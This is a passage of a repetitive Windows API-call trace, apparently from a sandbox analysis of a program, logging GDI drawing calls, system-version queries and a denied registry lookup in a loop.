lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.794] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.794] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.794] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.794] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcc0401cd [0087.794] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xca0401d0 [0087.794] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bc4 [0087.794] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bc5 [0087.795] CombineRgn (hrgnDst=0x1040bc4, hrgnSrc1=0xcc0401cd, hrgnSrc2=0xca0401d0, iMode=1) returned 1 [0087.795] CombineRgn (hrgnDst=0x1040bc5, hrgnSrc1=0xcc0401cd, hrgnSrc2=0xca0401d0, iMode=4) returned 2 [0087.795] CreateSolidBrush (color=0xff) returned 0x2100bc3 [0087.795] CreateSolidBrush (color=0xff0000) returned 0x1100bc6 [0087.795] DeleteObject (ho=0x1100bc6) returned 1 [0087.795] DeleteObject (ho=0xca0401d0) returned 1 [0087.795] DeleteObject (ho=0xcc0401cd) returned 1 [0087.795] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.795] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.795] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.795] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.795] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.795] BeginPath (hdc=0x0) returned 0 [0087.795] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.795] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.795] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.795] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.795] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.795] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.795] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.795] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.795] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcb0401d0 [0087.795] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcd0401cd [0087.795] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bc7 [0087.795] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bc8 [0087.795] CombineRgn (hrgnDst=0x1040bc7, hrgnSrc1=0xcb0401d0, hrgnSrc2=0xcd0401cd, iMode=1) returned 1 [0087.795] CombineRgn (hrgnDst=0x1040bc8, hrgnSrc1=0xcb0401d0, hrgnSrc2=0xcd0401cd, iMode=4) returned 2 [0087.795] CreateSolidBrush (color=0xff) returned 0x2100bc6 [0087.795] CreateSolidBrush (color=0xff0000) returned 0x1100bc9 [0087.795] DeleteObject (ho=0x1100bc9) returned 1 [0087.795] DeleteObject (ho=0xcd0401cd) returned 1 [0087.795] DeleteObject (ho=0xcb0401d0) returned 1 [0087.795] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.795] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.795] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.795] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.795] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.795] BeginPath (hdc=0x0) returned 0 [0087.795] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.795] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.795] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.795] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.796] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.796] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.796] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.796] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.796] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xce0401cd [0087.796] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcc0401d0 [0087.796] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bca [0087.796] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bcb [0087.796] CombineRgn (hrgnDst=0x1040bca, hrgnSrc1=0xce0401cd, hrgnSrc2=0xcc0401d0, iMode=1) returned 1 [0087.796] CombineRgn (hrgnDst=0x1040bcb, hrgnSrc1=0xce0401cd, hrgnSrc2=0xcc0401d0, iMode=4) returned 2 [0087.796] CreateSolidBrush (color=0xff) returned 0x2100bc9 [0087.796] CreateSolidBrush (color=0xff0000) returned 0x1100bcc [0087.796] DeleteObject (ho=0x1100bcc) returned 1 [0087.796] DeleteObject (ho=0xcc0401d0) returned 1 [0087.796] DeleteObject (ho=0xce0401cd) returned 1 [0087.796] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.796] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.796] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.796] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.796] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.796] BeginPath (hdc=0x0) returned 0 [0087.796] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.796] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.796] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.796] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.796] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.796] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.796] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.796] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.796] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcd0401d0 [0087.796] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcf0401cd [0087.796] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bcd [0087.796] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bce [0087.796] CombineRgn (hrgnDst=0x1040bcd, hrgnSrc1=0xcd0401d0, hrgnSrc2=0xcf0401cd, iMode=1) returned 1 [0087.796] CombineRgn (hrgnDst=0x1040bce, hrgnSrc1=0xcd0401d0, hrgnSrc2=0xcf0401cd, iMode=4) returned 2 [0087.796] CreateSolidBrush (color=0xff) returned 0x2100bcc [0087.796] CreateSolidBrush (color=0xff0000) returned 0x1100bcf [0087.797] DeleteObject (ho=0x1100bcf) returned 1 [0087.797] DeleteObject (ho=0xcf0401cd) returned 1 [0087.797] DeleteObject (ho=0xcd0401d0) returned 1 [0087.797] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.797] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.797] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.797] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.797] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.797] BeginPath (hdc=0x0) returned 0 [0087.797] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.797] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.797] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.797] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.797] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.797] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.797] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.797] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.797] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd00401cd [0087.797] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xce0401d0 [0087.797] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bd0 [0087.797] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bd1 [0087.797] CombineRgn (hrgnDst=0x1040bd0, hrgnSrc1=0xd00401cd, hrgnSrc2=0xce0401d0, iMode=1) returned 1 [0087.797] CombineRgn (hrgnDst=0x1040bd1, hrgnSrc1=0xd00401cd, hrgnSrc2=0xce0401d0, iMode=4) returned 2 [0087.797] CreateSolidBrush (color=0xff) returned 0x2100bcf [0087.797] CreateSolidBrush (color=0xff0000) returned 0x1100bd2 [0087.797] DeleteObject (ho=0x1100bd2) returned 1 [0087.797] DeleteObject (ho=0xce0401d0) returned 1 [0087.797] DeleteObject (ho=0xd00401cd) returned 1 [0087.797] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.797] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.797] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.797] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.797] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.797] BeginPath (hdc=0x0) returned 0 [0087.797] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.797] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.797] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.797] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.797] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.797] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.797] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.797] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.798] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcf0401d0 [0087.798] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd10401cd [0087.798] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bd3 [0087.798] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bd4 [0087.798] CombineRgn (hrgnDst=0x1040bd3, hrgnSrc1=0xcf0401d0, hrgnSrc2=0xd10401cd, iMode=1) returned 1 [0087.798] CombineRgn (hrgnDst=0x1040bd4, hrgnSrc1=0xcf0401d0, hrgnSrc2=0xd10401cd, iMode=4) returned 2 [0087.798] CreateSolidBrush (color=0xff) returned 0x2100bd2 [0087.798] CreateSolidBrush (color=0xff0000) returned 0x1100bd5 [0087.798] DeleteObject (ho=0x1100bd5) returned 1 [0087.798] DeleteObject (ho=0xd10401cd) returned 1 [0087.798] DeleteObject (ho=0xcf0401d0) returned 1 [0087.798] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.798] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.798] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.798] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.798] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.798] BeginPath (hdc=0x0) returned 0 [0087.798] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.798] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.798] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.798] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.798] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.798] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.798] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.798] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.798] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd20401cd [0087.798] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd00401d0 [0087.798] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bd6 [0087.798] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bd7 [0087.798] CombineRgn (hrgnDst=0x1040bd6, hrgnSrc1=0xd20401cd, hrgnSrc2=0xd00401d0, iMode=1) returned 1 [0087.798] CombineRgn (hrgnDst=0x1040bd7, hrgnSrc1=0xd20401cd, hrgnSrc2=0xd00401d0, iMode=4) returned 2 [0087.798] CreateSolidBrush (color=0xff) returned 0x2100bd5 [0087.798] CreateSolidBrush (color=0xff0000) returned 0x1100bd8 [0087.798] DeleteObject (ho=0x1100bd8) returned 1 [0087.798] DeleteObject (ho=0xd00401d0) returned 1 [0087.798] DeleteObject (ho=0xd20401cd) returned 1 [0087.798] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.798] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.799] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.799] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.799] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.799] BeginPath (hdc=0x0) returned 0 [0087.799] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.799] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.799] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.799] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.799] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.799] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.799] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.799] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.799] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd10401d0 [0087.799] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd30401cd [0087.799] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bd9 [0087.799] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bda [0087.799] CombineRgn (hrgnDst=0x1040bd9, hrgnSrc1=0xd10401d0, hrgnSrc2=0xd30401cd, iMode=1) returned 1 [0087.799] CombineRgn (hrgnDst=0x1040bda, hrgnSrc1=0xd10401d0, hrgnSrc2=0xd30401cd, iMode=4) returned 2 [0087.799] CreateSolidBrush (color=0xff) returned 0x2100bd8 [0087.799] CreateSolidBrush (color=0xff0000) returned 0x1100bdb [0087.799] DeleteObject (ho=0x1100bdb) returned 1 [0087.799] DeleteObject (ho=0xd30401cd) returned 1 [0087.799] DeleteObject (ho=0xd10401d0) returned 1 [0087.799] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.799] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.799] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.799] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.799] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.799] BeginPath (hdc=0x0) returned 0 [0087.799] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.799] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.799] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.799] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.799] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.799] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.799] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.799] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.800] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd40401cd [0087.800] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd20401d0 [0087.800] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bdc [0087.800] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bdd [0087.800] CombineRgn (hrgnDst=0x1040bdc, hrgnSrc1=0xd40401cd, hrgnSrc2=0xd20401d0, iMode=1) returned 1 [0087.800] CombineRgn (hrgnDst=0x1040bdd, hrgnSrc1=0xd40401cd, hrgnSrc2=0xd20401d0, iMode=4) returned 2 [0087.800] CreateSolidBrush (color=0xff) returned 0x2100bdb [0087.800] CreateSolidBrush (color=0xff0000) returned 0x1100bde [0087.800] DeleteObject (ho=0x1100bde) returned 1 [0087.800] DeleteObject (ho=0xd20401d0) returned 1 [0087.800] DeleteObject (ho=0xd40401cd) returned 1 [0087.800] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.800] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.800] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.800] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.800] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.800] BeginPath (hdc=0x0) returned 0 [0087.800] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.800] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.800] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.800] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.800] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.800] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.800] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.800] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.800] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd30401d0 [0087.800] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd50401cd [0087.800] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bdf [0087.800] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040be0 [0087.800] CombineRgn (hrgnDst=0x1040bdf, 